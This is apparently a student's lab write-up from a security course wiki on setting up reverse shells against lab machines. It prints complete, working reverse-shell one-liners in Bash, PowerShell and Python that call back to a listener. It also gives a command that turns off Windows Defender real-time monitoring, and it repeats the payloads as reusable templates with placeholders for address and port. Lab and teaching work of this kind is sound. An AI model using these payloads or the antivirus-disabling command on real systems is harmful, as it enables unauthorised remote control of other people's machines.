Lab 8.2 Reverse Shells - Oliver-Mustoe/Oliver-Mustoe-Tech-Journal GitHub Wiki

In this lab we explored reverse shells and how to set them up/perform them in Bash, Command Prompt, and Python.

Notes

First I logged into sec335-rocky(10.0.17.200), a generic Rocky Linux system meant for SEC-335 practic, with my cyber.local credentials. I then, on my kali box, setup a nc listener on port 4449/tcp with the command:

nc -nlvp 4449

nc flags explained:

-n = No DNS or service lookups
-l = Listen for an incoming connection instead of beginning a connection with a remote host
-v = Verbose output
-p = Specify source port to be used

Then on sec335-rocky, I used a native bash reverse shell to connect to the listener (command below):

/bin/bash -i >& /dev/tcp/10.0.17.103/4449 0>&1

With this, I could interact with sec335-rocky with my nc session!

I would then test this further by using the Weevely webshell I made in Lab 8.1 - Weevely to execute the same native bash reverse shell on the Pippin target (10.0.5.25). Below is a screenshot showing this process as well as showing I can execute commands on the target:

Then I logged onto my Windows VM and turned off Windows Defender with the following command in Powershell:

Set-MpPreference -DisableRealtimeMonitoring $true

Afterwards, with a nc listener (same command as above) on my Kali VM, I could run the following code in Command Prompt on my Windows VM to have a Powershell reverse shell in Kali (example of this in screenshot):

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.17.103',4449); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Finally, back on sec335-rocky, I ran the following Python command (with a nc listener on Kali) to get a Python reverse shell (modified version of this script found on Github by user "ylevalle"):

python3 -c "import sys, socket, os, pty;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(('10.0.17.103',4449));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn('/bin/bash');"

Screenshot of above Python reverse shell process:

Stripped commands

Below is the commands for this lab stripped of IP's/ports for usage later:

nc listener

nc -nlvp {PORT}

Bash reverse shell

/bin/bash -i >& /dev/tcp/{IP_OF_LISTENER}/{PORT} 0>&1

Windows Powershell reverse shell

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('{IP_OF_LISTENER}',{PORT}); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Python reverse shell

(Modified from https://github.com/ylevalle/python36shells/blob/master/reverse_shell.py):

python3 -c "import sys, socket, os, pty;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(('{IP_OF_LISTENER}',{PORT}));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn('/bin/bash');"

Reflection

Make sure to know what interface (eth0, wg0) I should be targeting for that lab.
Reverse shells are a powerful tool in a attackers toolbox.
From our Wireshark captures in 8.1 and 8.2, monitoring traffic to see if there is any suspicious activity happening is vital. So with that in mind, I also want to explore and find a more encoded reverse shell (the same way that Weevely is a encoded webshell.)